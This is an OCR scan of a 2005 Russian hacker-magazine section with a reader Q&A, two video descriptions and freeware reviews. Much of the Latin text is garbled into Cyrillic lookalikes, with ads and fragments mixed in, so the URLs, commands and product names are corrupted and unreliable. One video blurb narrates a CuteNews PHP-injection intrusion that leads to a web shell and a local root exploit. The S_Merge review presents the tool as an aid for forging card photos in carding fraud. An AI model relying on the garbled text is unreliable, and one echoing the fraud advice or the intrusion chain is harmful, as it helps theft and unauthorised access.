(тзбп.тісгозоІІсот/ХМихМІОошІоасІз), 

РНР (ѵѵѵѵѵѵ.рЬр.пеі/хтГ), 

РегІ ( ѵѵѵѵѵѵ.хтІ.сот/риЬ/а/2000/04/05/іеаіиге /) , 

С++ {хтіарасЬе . огд/хегсез-с/) , 

^ѵа (хті.арасііе . огд/хегсез-р ) , 

ОеІрЫ/СВиіІсІег ( ѵѵѵѵѵѵ.ісот-сіѵ. сІе/ргосІисіз/хтІ_іооІз /) , 
РуІНоп ( исІіе.одЬиіі.пеі/іесШЗиііе/атага /) 

О: Подскажи, как включить компрессию «на лету» для 
динамических сайтов, написанных на РНР и РегІ. 
Основная часть контента — сплошной текст, который 
должен будет очень хорошо сжиматься. 

А: В случае использования РНР и АрасНе все предельно 
просто. Нужно лишь прописать 2 строки в файл Фіассезз: 
рІір_ІІад гНЬ . оиіриі_сотргеззіоп оп 
рІір_ѵаІие іІіЬ.оиіриІ_сотргеззіоп_ІеѵеІ 2 
Напомню, что .Массезз содержит конфигурацию той 
папки веб-сервера, в которой сам находится. С его по- 
мощью можно запаролить ресурс, обозначить некото- 
рые нюансы работы или, как в нашем случае, для РНР- 
сценариев активизировать компрессию «на лету». 

В случае РегГа задача несколько усложняется, и одним 
.Массезз'ом тут не обойтись. Решая аналогичную задачу, 
я воспользовался специальным модулем С0І::ѴѴеЬ02ір. 
Он чрезвычайно простой в использовании, однако есть 
одно но: его нужно подключить к РегГу, установленному 
на сервере. Скорее всего, у тебя нет собственного деди- 
ка, поэтому подключать модуль придется службе подде- 
ржки твоего хостинг-провайдера. Модуль С0І::ѴѴеЬ02ір, 
а также его аналог СОІ::Сотргезз::02ір находятся на 
сайте СРАИ ( тт.срап.огд ). Кроме этого, рекомендую 
ознакомиться с документом ѴѴеЬ Сопіепі Сотргеззіоп 
РАО (Мір://регІ.арасІіе.огд/сІосз/ІиіогіаІз/сІіепі/сотргез- 
зіоп/сотргеззіоп.ЫтІ) з: 






Побывал в далеких странах? 
Накопилось много интересных 
фотографий? 
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Создай свой цифровой фотоархив на 

ЫІр./ЛоІ’О.таіІ.гц/ и покажи друзьям! 

1 Доступ иэ любо* точки мира 
2 . Удобная с нс гемо альбомов 
3 Рол актирован но фотографии 

4. возможность ограничения доступа только для друзой 
5 Рейтинги лучших фотографий 
А Творческие конкурсы с притоми 



фото д&таіі.ги 

Ваш личный цифровой фотоархив! 
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Название видео: 

СиІеМеѵѵз Ьид I СІКіІІег 



Ежедневно в багтраке появляются описания но- 
вых уязвимостей в скриптах. Даже опытный веб- 
программист порой не может заранее просчитать 
все хакерские ходы и незаметно для себя остав- 
ляет в коде потенциальные уязвимости. С этим 
ничего не поделаешь: любому человеку свой- 
ственно ошибаться. Собственно говоря, этот ро- 
лик посвящен очередной программерской ошиб- 
ке в популярном новостном скрипте СиІеЫеѵѵз. С 
помощью найденного бага хакер, как это неред- 
ко бывает, смог получить несанкционированный 
доступ к системе. 

Уязвимость достаточно нетипичная, и суть ее 
заключается в следующем. Получив РОЗТ-зап- 
рос, скрипт заносит содержимое поля «СІіепЫр» 
в файл ЛоосІ.сІЬ.рІір. Проверка содержимого не 
осуществляется, что является непростительной 
оплошностью со стороны программиста. Можно 
сформировать такой запрос, в результате кото- 
рого в указанный файл внедрится РНР-код, а 





значит - удастся получить веб-шелл на сервере. 
Итак, подробный сценарий взлома. Сначала 
взломщик нашел жертву, бесхитростно восполь- 
зовавшись поисковиком (даже Форб так иногда 
делает — наблюдал за процессом лично :) ). Пос- 
ле этого он добавил комментарий к одной из 
опубликованных на сайте новостей. Специальной 
программе, которая предварительно была уста- 
новлена на его компьютере, удалось перехватить 
запрос, отправленный на сервер браузером. Осо- 
бым образом отредактировав его значение, ха- 
кер отослал запрос еще раз, но уже вручную. Об- 
работка этого РОЗТ-реквеста на сервере приве- 
ла к тому, что магическая строка символов запи- 
салась в РНР-файл, в результате чего хакер зав- 
ладел веб-шеллом. Затем взломщик нашел ди- 
ректорию, доступную для записи, и успешно за- 
лил в нее г57зИеІІ. Так сказать для удобства рабо- 
ты на сервере. Обнаружив старую версию ядра, 
взломщик пробует запустить локальный слойт 
типтар — и попытка завершается успехом. 

Название видео: 

Установка баунсера рзуВЫС I РорКогп 

Повествовать о том, что такое ІРС и как им поль- 
зоваться, по крайней мере, глупо. Пусть этим за- 
нимаются журналы для ламеров, а ты, я уверен, 
знаешь подобный примитив с пеленок. Но вот о 
том, как анонимно висеть на канале ирки и быть 
постоянно ОІЧШЕ, не пропуская ни одного напи- 
санного сообщения, рассказать стоит. Видеома- 
териал этого номера именно этому и посвящен. 
Для анонимной работы применяется специальная 
программа — так называемый, баунсер. В этом 
ролике я покажу, как работать с популярной соф- 
тиной рзуВІЧС, сочетающей в себе огромное коли- 
чество полезных и не очень :) функций и свойств. 



В самом начале видео я логинюсь на сервере, ко- 
торый будет служить площадкой для установки 
тулзы. После входа в систему, необходимо перей- 
ти в каталог, в котором лежит скомпилированная 
версия программы. Начинается процесс конфигу- 
рации, который сводится к тому, что я открываю 
файл рзуЬпс.сопІ и вписываю туда адрес ІВС-сер- 
вера, пароль и порт баунсера, а также свой ник 
и имя канала. После этого мне остается только ак- 
тивировать ІНС-проксю с помощью команды 
./рзуЬпс и приступать к ее тестированию. Для это- 
го я запускаю любимый ІВС-клиент и в качестве 
ІВС-сервера указываю ІР-адрес хоста и порт, на 
котором только что был установлен баунсер. Пом- 
нишь, во время конфигурирования рзуВЫС я ука- 
зал пароль? Сейчас его необходимо ввести в поле 
«Зегѵег раззѵѵогсі». Осуществив подключение, 
я убеждаюсь, что баунсер работает корректно. 0 
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РгодРѴВ 4.61 

ѴѴіпсІоѵѵз 95/98/2К/ХР 

Ргееѵѵаге 

Зіге: 2204 Кб 

ѵѵѵѵѵѵ.ргодсІѵЬ.сот 



Когда-то хотелось все домашнее хозяйство привести к единому 
знаменателю компа: видеоглазок на двери, аудиосистемы со всей 
квартиры, передвигающиеся шторы (технология XI 0) и даже тос- 
тер. Потом страсти по цифровому дому поутихли, и на смену около- 
компьютеренным девайсам пришли специальные РС-железки со 
всеми функциями домашней техники. ОѴВ-карты для просмотра 
спутникового телевидения на компе стали тому ярким примером. 
Заимев тарелку, ты можешь открыть собственное вещание видео- 
потока в Сеть при помощи РгодОѴВ. Когда же тебя обломали, не 
поставили БѴВ-карту и тарелку, софт можно использовать в каче- 
стве телевизора для уже налаженных броадкастов в Сети. Софт 
создан нашим кодером, чьи коллеги хорошо понимают отечествен- 
ную реальность — они разрулили специальный плагин для просмот- 
ра телетекста, все еще столь популярного у нас. Увы, софт привя- 
зан к конкретным картам, так что для работы с данным образцом 
может потребоваться апгрейд. Рабочий хардварный БУВ-декодер 
можно купить уже за $80 — 120. 
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СИР (ВиіІсІ 7570 АІрНа) 

ѴѴіпсІоѵѵз 2к/ХР/2003 

Зіге: 1.8 Мб 

Ргееѵѵаге 

ѵѵѵѵѵѵ.дір.ги 



Пользоваться сервисом ІСО я начал еще в то время, когда в Москве провай- 
деров было меньше, чем пальцев на руке. И с тех самых пор с классическо- 
го аськиного клиента никуда не пересаживался. Как-то не было необходи- 
мости. А тут решил вот попробовать. И подсел. Подсел на ОІР. Отечествен- 
ная разработка, между прочим. Бесплатный клиент для передачи мгновен- 
ных сообщений, который позволяет подключаться к различным общедос- 
тупным серверам. Разработка ОІР на данный момент находится в стадии 
Альфа, что не исключает наличие в программе недоработок и уязвимостей. 
Есть всякие стандартные развлечения типа скинов и языковых модулей. 
Непосредственно при установке можно выбрать русскоязычный интер- 
фейс. В программе реализовано очень много мелких, но действительно 
приятных штук, например, можно запросто отстрелить себя из чужого 
контакт-листа, чем я и занимался сразу же после установки ОІР на свою 
машину. Практически все регулируется и настраивается. К чести авто- 
ра программы скажу, что за все время эксплуатации (около полугода) 
программа отвалилась всего лишь один раз. Вот как надо писать альфа- 
версии! А уж релиз-то какой обещает быть. В общем, всем качать! 
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Ргіѵег СІеапег РгоІеззіопаІ ѵ. 3.3 

ѴѴіпсіоѵѵз 95, 98, 985Е, МЕ, 2000, ХР 

Зіге: 1.5 Мб 

Ггееѵѵаге 

ѵѵѵѵѵѵ.сігіѵегсіеапег.пеі 



В названии — смысл! Утилитка предназна- 
чена для тотального удаления из системы 
всяких, ставших ненужными, драйверов от 
ЗБІх, АТІ, Сгеаііѵе, Іпіеі, кХ, пѴісІіа, ВеаКек, 
83 ОгарИісз, 818 ОгарИісз и ТигІІе ВеасІі. Ес- 
ли ты хоть раз ставил драйвера поверх ста- 
рых, то наверняка имел счастье наблюдать 
разнообразные косяки, случающиеся, ког- 
да старые и новые драйвера начинают 
между собой враждовать. У меня при переустановке драйверов все дела- 
ется строго через зачистку посредством Огіѵег СІеапег РгоІеззіопаІ. Языко- 
вые модули в программе поддерживаются, но найти русский мне пока не 
удалось. На самом деле это совсем не проблема, все операции в програм- 
ме просты, понятны и доступны. Бэкап и восстановление — в ассортимен- 
те. Программа абсолютно бесплатна, даже в профессиональной версии. 




СЭКоІІег ѵ. 6.02 

ѴѴіпсіоѵѵз 9х/Ме/ЫТ/2к/ХР 

8іге: 3,37 Мб 

ВІіагеѵѵаге (Работает аж 14 дней) 
ѵѵѵѵѵѵ.сбгоііег.сот 



Добрался я до СОВоІІег случай- 
но. Зарядил как-то в драйв 
диск, куда записал фотогра- 
фии, а он возьми, да не проч- 
тись. А копии на винте давно 
снесены. И фотографии поза- 
рез нужны. И так и сяк пробо- 
вал, не извлекаются фотогра- 
фии никак и ничем, ну хоть ты 
тресни. Последнее средство ос- 
тавалось — СОВоІІег. Действительно мощный и удобный в работе комплект 
инструментов для восстановления данных на компакт-дисках. Внутри прог- 
раммы вы найдете: Оаіа ОБ Ьгоѵѵзег, сопіепі геабег, СО-гіррег, СО-ІезІег, СБ- 
саіаіодиег, 8еззіоп зеіесіог, СО Оаіа Везсие тобиіе. СОВоІІег умело читает 
нечитаемое. Попыхтел, конечно, но считал все, что мне было нужно из де- 
формированных зон. Ну и так, еще кое-что по мелочи умеет: тестирует дис- 
ки на предмет читабельности, создает архивы данных, ищет в них нужные 
файлы, копирует аудиодиски, поддерживает восстановление дисков, соз- 
данных с помощью бгад апб бгор программ, таких как Абаріес ОігесГСО и 
ІМего Вигпіпд ВОМ, в том числе записанных в мультисессии. Ищет и восста- 
навливает файлы на ІЮР-дисках. Работает с СО-БА, СБ-ВОМ, СО-УМО, СО- 
ВОМ ХА, Міхеб-Мосіе СО, 8іатресІ МиШзеззіоп СО, ОѴО-ВОМ, ОѴО-В, ОУО- 
ВѴѴ, ОѴО+В, ОѴО+ВѴѴ. 

ОѴО Ісіепііііег ѵ4.2.0 

ѴѴіпсіоѵѵз 9х/Ме/ЫТ/2к/ХР 

8іге: 1016 Кб 

Вгееѵѵаге 

ІШр://бѵШбепШіег.сШгеакз.соіті 




Если кто не знает, то ОѴО-болванки под какой-нибудь надежной торго- 
вой маркой может клепать кто угодно. И чтобы более-менее достоверно 

выяснить, что это ты такое в свой 
ОѴО-драйв засовываешь, стоит 
скормить болванку товарищу по 
фамилии ОѴБ ІбепМіег. Узнаете 
много нового. Программа выводит 
информацию об изготовителе, ти- 
пе ОѴБ, скоростях, на которых воз- 
можна запись, и еще много чего 
полезного. Для настоящих ОѴО- 
фриков имеется онлайновая, пос- 
тоянно пополняемая база произво- 
дителей 0\Ю-дисков. Софтина 
поддерживает следующие форма- 
ты 0\Ю-болванок: сіѵб+г, сіѵб+г сІІ, 




сіѵб+п/ѵ, сіѵсі+гѵѵ сІІ, бѵсі-г, бѵсі-г сІІ, бѵсі-гѵѵ и бѵсі-гат. Ну и свежеразработан- 
ные Ыи-гау тесііа (Ьб-г и Ьб-ге), конечно же. Да, сІІ, если кто не знает, — это 
двухслойные диски. 

Педбиргете Рго 1.2 

ѴѴіпсіоѵѵз 9х/Ме/ІМТ/2к/ХР 

8іге: 859 Кб 

ВНагеѵѵаге 

ѵѵѵѵѵѵ.тасесгаИ.сот/гедзиргете 




Раньше, когда я побаивался руками-крюками залезать в виндовый ре- 
естр, попытки что-то там наладить иной раз приводили к старому-добро- 
му форматированию системного раздела и милой сердцу каждого нас- 
тойчивой установке свежей винды. Потом появилась программа 
ВедСІеапег, отлично известная в узких кругах, потом и она канула в Ле- 
ту, оставив после себя іѵіб РоѵѵегТооІз. А сегодня на смену им всем 
пришла Вед8иргете Рго. Программа, прежде всего, работает с реест- 
ром, но далеко не только этим ограничивается сфера ее применения. 
Она не только очистит реестр от ненужных и устаревших записей, но 
и автоматически исправит найденные ошибки, возьмет на себя управле- 
ние программами, автоматически запускаемыми при загрузке ѴѴіпсіоѵѵз, 
удаление записей из списка установленных программ, а также отключе- 
ние ненужных элементов в контекстном меню Проводника и ІЕ. 
Вед8иргете Рго — рекордсмен по скорости сканированию реестра и ко- 
личеству нахождения неверных значений. Вед8иргете Рго имеет функ- 
цию отката, что позволяет вернуть реестр в первоначальное состояние в 
случае необходимости. Русский языковой модуль имеется, работает 
софтина быстро, тщательно, качественно и лишнего ничего не удаляет. 



ТНитЬзРІиз ѵ.7 

ѴѴіпсіоѵѵз 9х/Ме/І\ІТ/2к/ХР 

8іге: 17.8 Мб 

8Нагеѵѵаге 

ѵѵѵѵѵѵ.сегіоиз.сот 




Есть такие специальные люди — папарацци. Им приходится денно и 
нощно сидеть в засадах не только с фотокамерой, огромным телеобъек- 
тивом, камерой, микрофоном, ручкой и блокнотом, но подчас и с синяка- 
ми и шишками, в изобилии высыпаемыми на фотоохотников за звезда- 
ми этими самыми звездами. Несложно догадаться, что само слово «па- 
парацци» имеет итальянское происхождение, хотя наиболее свирепыми 
и профессиональными папарацци общепризнаны англичане, французы 
и американцы. Иногда папарацци делают действительно невозможное. 
Я тоже хотел сделать невозможное и сделал, получив 
забитые под завязку винчестеры. Надо было срочно сортировать свои 
многочисленные фотошедевры. Тут нужен хороший каталогизатор, как 









Лреи.кі ннріуа:іыюі о 
выделенного сервера 

ка/і ініріітіить г.ат'тт.'нные оЖигІілНШі 




минимум, умеющий работать с базами заданных ключевых слов и пока- 
зывать веселые картинки по первому требованию. Так уж случилось, что 
всеми любимый АСЭЗее я на дух не переношу, вот и нашел альтернати- 
ву, очень и очень подходящую для управления завалами картинок. 
ТПитЬз РІиз ее фамилия. Обычным образом программа работает так: 
запускаешь, показываешь, какие диски сканировать на предмет наличия 
картинок, и получаешь базу превьюшек. Сортируешь по-всякому, зада- 
ешь ключевые слова, делаешь с картинками что хочешь. Простой графи- 
ческий редактор внутри есть, ЕХІР виден, работает все шустро, снимки 
на гетоѵаЫе сігіѵез — не проблема. Возможности поиска исчерпываю- 
щие: по специально заданным ключевым словам, по комментариям, по 
ЗОІ_-запросам, по ширине и высоте, да хоть по толщине. Помимо этого, 
умеет корректно распозновать дублирующиеся картинки, преобразовы- 
вать файлы в различные форматы и проводить множество других авто- 
матических операций. В процессе работы ведется СЮВС база изображе- 
ний, что позволяет программе, поддерживающей данный интерфес, 
подключаться к базе данных. Но это уже излишество :). С сайта програм- 
мы можно накачать плагинов для работы с ВАѴѴ-файлами. 

КіѵаТипег2 ѵ. 15.7 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 1 Мб 

Ргееѵѵаге 

ѵѵѵѵѵѵ.пѵѵѵогісі.ги 



ВіѵаТипег на сегодня — одно 
из мощнейших инструменталь- 
ных средств для настройки ви- 
деокарт фирм ІМѴЮІА и АТІ, ра- 
ботающих под ОС ѴѴіпсІоѵѵз. 
Классика жанра для ІМѴЮІА- 
водов. Пользуюсь давно и с 
удовольствием. Пожалуй, от 
себя ничего выдумывать не бу- 
ду, лучше познакомлю вас с 
авторским видением предназ- 
начения. ВіѵаТипег — полно- 
масштабная среда для наст- 
ройки любых видеокарт, осно- 
ванных на графическом про- 
цессоре ІМѴЮІА. ВіѵаТипег поддерживает все графические адаптеры 
ІМѴЮІА, начиная с семейства Віѵа ТІМТ и заканчивая последней серией 
ОеРогсе 6800. Кроме этого, обеспечивает поддержку широкого диапазона 
драйверов ІМѴЮІА, начиная с Оеіопаіог 2.08 и заканчивая последним семей- 
ством РогсеѴѴаге. Уникальные возможности по диагностике и аппаратному 
мониторингу в реальном времени и мощные инструменты, такие как встро- 
енный редактор реестра и скриптовый механизм реализации патчей, дела- 
ют инструментарий ВіѵаТипег непревзойденным. Дополнительно к полной 
поддержке продукции ІМѴЮІА ВіѵаТипег обеспечивает ограниченную подде- 
ржку видеокарт фирмы АТІ, начиная с ВАЭЕОІМ 8500 и выше. Весь функци- 
онал ВіѵаТипег, кроме настройки опций драйвера, также доступен пользова- 
телям видеокарт АТІ. Серьезная программа для серьезных людей и отноше- 
ния к себе требует самого серьезного. А потому без вдумчивого изучения 
РАО по использованию программы Шр://№шлѵмогІсІііѴдос5/гі_зсгірі8.ІіітІ 
лучше ее не использовать. Видеокарты нынче недешевы :). Ну и вкратце о 
возможностях: настройка параметров ОігесКЮ и Ореп(ЗІ_ драйвера видео- 
карты, разгон видеокарты как через драйвер, так и прямым доступом к «же- 
лезу», создание детального отчета о характеристиках видеокарты, возмож- 
ностях Оігесі ЗЭ и ОрепѲІ_ драйвера, режиме работы шины АОР, мониторе, 
управление работой шины АОР как через конфигурирование драйвера, так 
и напрямую, мониторинг в реальном времени частот, температур и напряже- 
ний видеокарты, скорости вращения кулера, измерение РРЗ, загруженнос- 
ти процессора и использования видеопамяти в играх и приложениях, разб- 
локирование отключенных блоков видеопроцессоров семейства ОеРогсе 
6X00 и еще куча всего полезного и толкового. 

$_Мегде 1.3 

ѴѴіпсІоѵѵз 95/98/2К/ХР 

ЗІпагеѵѵаге 

Зіге: 779 Кб 

ѵѵѵѵѵѵ.дгарЫсиііІз.сот/зтегде 



Темные личности любят вспоминать сладкую пору 90-х, когда можно бы- 
ло успешно затовариваться в онлайн-магазинах по сгенеренным номе- 
рам СС. Теперь же продавцы набили шишки на своих высоких лбах и на- 
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тѳрли мозоли в более нежных частях тела. Теперь им подавай все в пол- 
ном комплекте и ажуре: фотку СС и от руки накатанное заявление о сог- 
ласии на транзакцию. Тут хакерюги чешут репу и сожалеют о невнима- 
нии к рекламе курса фотошопа, увиденной в «Из рук в руки». Жадные, 
но ленивые бойцы скачивают простейшую тулзу 8_Мегде, которая поз- 
воляет успешно монтировать пару картинок (фоток) для достижения же- 
ланного мерчантом (интернет-барыгой) внешнего вида. Для любителей 
еще более острых игр по рисованию сложных документов есть чутко 
настраиваемые опции наложения водяных знаков. Гигабайтный 
РПоІоЗІіор с тонной плагинов замещает простая мегабайтная вещичка. 

АсІВет ЗЫМР Мападег 1.0.1 

ѴѴіпсІоѵѵз 2 К/2 003/Х Р 

ЗНагеѵѵаге 

Зіге: 19310 Кб 

ѵѵѵѵѵѵ.абгетзоК.сот 






Читатель, ты двуличен! 

Одна половина обижа- 
ется на описание попсо- 
вых прог, другая бранит 
за углубление в техни- 
ческие дебри админско- 
го и кодерского ПО. Ко- 
му верить? Отдадим 
дань первым с напоми- 
нанием о выходе новой 
серии ЗЫМР-менедже- 
ра, который заметно уп- 
ростит жизнь сисадми- 
ну, в чье царство закрались ЗІММР-девайсы — сетевые принтеры, аппа- 
ратные файрволы, свитчи и роутеры. Админить каждый из них — все 
равно, что заниматься делами каждой жены гарема в отдельности. Нет, 
мы поддерживаем комплексный подход, который предлагает рассмат- 
риваемая софтина. Увы, коммерческой версии в Р2Р и на ІВС найти не 
удалось, как и лекарства от доктора АзГы. При всем интересе данного 
образца он может скорее стать примером целого семейства админист- 
ративных примочек, которыми изобилует инет. Мне лично пришлось по 
вкусу дополнение к ЬАЫсІесосІег'у с понятным именем — ЗІММР Мападег. 
Здесь все же лучше обстоит дело с пилюлями от жадности. 




были выпущены Іѵѵеакег'ы, которые перелопачиванием кишок проги до- 
биваются наилучшего результата. Мы все устали от подобных приблуд 
для ІЕ и самой винды, его носящей. Здесь можно чутко настроить мод- 
ный РігеРох: кэш, соединение, оптимизация скорости загрузки как стра- 
ниц, так и самой проги. Философия твикера напоминает ІЕ'шную, так что 
все операции пройдут как по маслу, без участия клавиши Р1. 

Аз-ІІ-Туре ЗреІІег 3.1 

ѴѴіпсІоѵѵз 2К/2003/ХР 

ЗІпагеѵѵаге 

Зіге: 2655 Кб 

ѵѵѵѵѵѵ.Іапіх.сот 



Есть одно верное средство по- 
ложить на лопатки противника 
в столь популярном состяза- 
нии, как сетевой флейм, — 
указать на его неграмотность. 
В словесных баталиях неизбеж- 
ны ошибки. Средства сделать 
твоего недруга еще более нег- 
рамотным пока не было найде- 
но. Здесь же тебе предлагается 
панацея, которая создаст ореол природно-грамотного человека. Трени- 
роваться начнем с басурман, так как данная проверка ошибок 
(зреіісііескег) знает только британские и американские наречия анг- 
лийского. Скормить ей словарь из М3 ОІІісе (сизіот.сііс) не получилось. 
Однако в английском пререканий не было, прога умеет находить ошиб- 
ки при вбиве текста в среде любого софта: браузере, мыльном клиенте, 
аське, ІВС-клиенте и многих других. Интересное начинание, которому 
хочется пожелать скорейшего обретения русского словаря для спасе- 
ния нас от неграмотности в национальном словесном единоборстве. 




Оех$(ег 2.10 

ѴѴіпсІоѵѵз 95/98/Ме/2К/2003/ХР 

ЗІпагеѵѵаге 

Зіге: 7618 Кб 

ѵѵѵѵѵѵ.зоМѵзПагеѵѵаге.согп 




Газіеііох 0.7.8 

ѴѴіпсІоѵѵз 95/98/те/2К/2003/ХР 

Вгееѵѵаге 

Зіге: 58 Кб 

Ііир:/ЛазіегІох.то2СІеѵ.огд 



Как бы ты ни был крут, этого будет мало. 
Поставив РігеРох, королем ты не ока- 
жешься, пока все не будет на 100% выли- 
зано по теме новомодного браузера. Для 
каких бы сверхлюдей не делался софт, 
всех пожеланий не учесть. Тебе обяза- 
тельно потребуется изврат, которого ис- 
пугается сосед. Для победы страхов и 
достижения всеобщего удовлетворения 




В далеком 1999 году X обещал тебе сексуальную нирвану после обре- 
тения желанного образа Эф которому всего-то и надо было — скачать 
описанные проги для сведения музла и сделать убедительное лицо. 
Сейчас даже самое одухотворенное лицо потеряет свою убедитель- 
ность, если назовет себя ДЖ. Это настолько Рор и повсеместно, что 
пришло время стесняться своего недуга. Сейчас важность лица мож- 
но подчеркнуть, сообщив, что ты — высокооплачиваемый звуковой 
режиссер, который учит жизни всех этих хиппи-наркоманов-алкоголи- 
ков, которые лабают музыку на двух аккордах, а ты же им создаешь 
шедевры. Простой звуковой редактор, которым можно обработать му- 
зыкальное произведение любой сложности, просто двигая мышкой: 
здесь надо больше басов, здесь — убавить темп, а здесь — вообще 
молчать! Помимо профессиональной, но понятной обработки, есть 
уже привычное работникам винила сведение нескольких треков. Это 
не уникально, но оказывается очень соблазнительным данный тандем — 
сводника и редактора в одном лице. 









щ 











ѵѵѵѵѵѵ.гохіоп.кіеѵ.иа 




С85ЕР 0.3.0 


КВепате 3.0.9 


РОЗІХ (*ВЗЭ, Ыпих, Зоіагіз...) 


РОЗІХ (*ВЗЭ, Ыпих, Зоіагіз...) 


Размер (в Іаг.д т)\ 872 Кб. 


Размер (в Іаг.д т.): 707 Кб. 


И«р://сззеб.зоигсеІогде.пеІ 


Пир://ѵѵѵѵѵѵ. кгепате . пеі 


Лицензия: ОШ ОРІ_ 


Лицензия: ѲШ ОРІ_ 



Небольшой по размеру, основан- 
ный на (ЗТК+2 редактор, заточен- 
ный для редактирования С55. Ос- 
нащен «табовым» интерфейсом, 
функцией свертывания (фолдин- 
га) текста, подсветкой синтакси- 
са, автоматическим завершени- 
ем. Многие из этих возможностей 
предоставляются движком текс- 
тового редактора ЗсіпІіІІа, кото- 
рый тоже необходим для работы 
программы. 

В правой части главного окна на- 
ходится иерархичное дерево эле- 
ментов СЗЗ, из которого можно 
вставлять эти элементы и их значения в текст текущего документа. А вни- 
зу главного окна есть текстовая область, именуемая ЗсгаІсП Раб, — в нее 
можно копировать фрагменты текста. Содержимое Зсгаісіі Раб при выходе 
из программы не сохраняется. 

В СЗЗЕЭ встроено средство для проверки кода на правильность. После 
проверки СЗЗЕЭ наглядно показывает ошибочные места. СЗЗЕЭ под- 
держивает плагины. Плагины в дистрибутив не входят, их можно ска- 
чать отдельно с сайта продукта. 

Подведу итог. Удобная утилита для веб-разработчиков, для тех, кто знаком 
с СЗЗ, но ленится смотреть в его спецификацию каждый раз, когда забыл 
нужную деталь. 




ГІаѵѵііпсІег 1.26 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 

Размер (в Іаг.д т): 127 Кб. 

Ііир://ѵѵѵѵѵѵ.бѵѵІіееІег.сотЛІаѵѵІіпбег/ 
Лицензия: ОШ ОРІ_ 



РІаѵѵТіпбег — консольная утилита, которая сканирует исходный код (С/С++) 
на предмет слабых мест в области безопасности. Чтобы натравить утили- 
ту на исходники, достаточно дать в каталоге с ними команду вроде: 
ТІаѵѵТіпсІег *.с 

В процессе работы РІаѵѵТіпбег выводит список «тонких», с его точки зрения, 
мест, причем в каждом случае он показывает степень риска, выраженную 
заключенным в квадратные скобки числом от нуля до пяти. Пять — наихуд- 
ший результат, а ноль — лучший, но все равно стоит задуматься. 

Чтобы РІаѵѵТіпбег не ругался на определенные строки кода, рядом с ними в 
той же строке надо поместить комментарий вида: 

// РІаѵѵііпсіег: іапоге 

либо: 

Г РІаѵѵііпсіег: іапоге 7 

Вывести результаты работы РІаѵѵТіпбег в НТМЬфайл можно командой: 
ТІаѵѵТіпсІег -аиіеі — ИТтІ — сопТехТ проверяемый каталог > резѵльтат.іііті 
Что до результатов, то РІаѵѵТіпбег пишет достаточно подробно, в чем зак- 
лючается проблема участка кода, к чему такое положение вещей может 
привести и т.д. На английском, разумеется. 



Заточенная под КОЕ утилита 
для массового переименования 
файлов. Поддерживает форми- 
рование имен файлов по задан- 
ному пользователем шаблону. 
Помимо встроенных функций, 
оснащена дополнительными 
модулями, с помощью которых 
можно, например, переводить 
имена файлов из одной коди- 
ровки в другую, устанавливать, полученные в результате переименова- 
ния файлов, различные атрибуты (права доступа, дату и время), выпол- 
нять некую команду для каждого файла после переименования. Интер- 
фейс КВепате работает в двух режимах. В первом, для начинающих 
пользователей, КВепате предоставляет пошаговые мастера-визарды. 
В обычном же режиме КВепате работает, как окно с табами-вкладка- 
ми. Текущие настройки можно сохранять в виде профилей для последу- 
ющей их загрузки. 




Нусігодеп 0.9.2 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 

Размер (в Іаг.дг): 2.7 Мб 

Иир://ѵѵѵѵѵѵ.Ііубгодеп-ти5іс.огд 
Лицензия: ОШ 0РІ_ 



Программная драм-машина. «Железные» аналоги такой стоят по несколь- 
ко сотен долларов. Как и коммерческие, софтварные аналоги Нубгодеп 
для систем ѴѴіпбоѵѵз и Мае 03 X. А тут — свободное ПО. Бери и пользуй- 
ся. Для работы Нубгодеп нужна библиотека 01 Третья ее версия для стабиль- 
ной ветки Нубгодеп, а четвертая для нестабильной. 

Как устроена эта программная ударная установка? Есть наборы 
ударных, где каждый звук обычно в формате РІас. Есть паттерны 
— ритмические рисунки, из которых составляется композиция. В 
наличии имеется также редактор инструментов и удобный мик- 
шер. Поддерживается вывод через звуковые подсистемы 033, 
АІ_ЗА и 6АСК. Можно управлять драм-машиной по протоколу МЮІ. 
Экспорт в МЮІ, рендеринг в ѴѴАѴ-файл — чего еще можно же- 
лать? Только новых версий. Дополнительные наборы ударных 
инструментов можно скачать с главного сайта программы. 




[ХАКЕР 12 [84] 05 > ЮНИТЫ 153 ] 






[хакер 12 [84] 05 > ЮНИТЫ 154 ] 



Каі 0.6.4 

Р05ІХ (*ВЗР, Ыпих, Зоіагіз...) 
Размер (в Хаг.дг): 809 Кб. 

Иир://ка^.тапсІгіѵа.сот 

Лицензия: ѲШ ѲРІ_ 



Еще довольно сырой, но ра- 
бочий поисковик вроде гномь- 
его Веадіе или локального по- 
исковика от Ѳоодіе. КаХ зато- 
чен под КОЕ. Состоит из двух 
частей: индексирующего де- 
мона и клиента, который де- 
лает запросы к проиндексиро- 
ванной информации. КаХ ин- 
дексирует картинки, музыку, 
тексты. Сам или с помощью 
дополнительных утилит вытя- 
тивает из файлов мета-данные, поэтому осуществлять поиск можно не толь- 
ко по тексту (включая РОЕ, ООТ и ООС) или среди имен файлов, но и в ме- 
та-данных (например, МРЗ-тэгах). 

Движок КаХ работает хорошо, однако графический интерфейс с каждой 
новой версией становится все более неработоспособным. Надо ска- 
зать, что в опробованной мною ранее версии 0.6.1 работало больше 
кнопок и пунктов меню, нежели в текущей версии 0.6.4. 

Скорость индексирования у КаХ невелика. На индексирование файлов 
на жестком диске объемом 200 Гб могут уйти месяцы. Поэтому КаХ 
удобно «натравливать» на отдельные каталоги (например, определен- 
ного пользователя), где поиск действительно необходим. 




бсгіЬиз 1.3.1 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 
Размер (в 1аг.Ьг2): 8.43 Мб. 

ІШр://ѵѵѵѵѵѵ.зсгіЬиз.огд.ик 

Лицензия: ѲШ ѲРІ_ 



1 іі 1 1 4і Ч ІИ л Чк«г-' 




Мощнейшая програм- 
ма для верстки, линук- 
совый аналог таких 
коммерческих продук- 
тов, как АсІоЬе ІпОезідп 
и Оиагк ХРгезз. Руси- 
фицирована Александ- 
ром Прокудиным. Ос- 
нащена модулем рус- 
ских переносов. Обла- 
дает всеми функциями 
продуктов для ОТР 
(ОезИор РиЫізНіпд), 
включая цветоделение, 

поддержку профилей ІСС. Разумеется, реализована поддержка СМУК. 
Форматы вывода — РОР (до 1.5 включительно), ЕР5, 5ѴО. Формат доку- 
ментов ЗсгіЬиз основан на ХМІ_ и не импортируется коммерческими про- 
дуктами верстки, так же как ЗсгіЬиз не поддерживает импорт файлов 
ІпОезідп и Оиагк ХРгезз. 

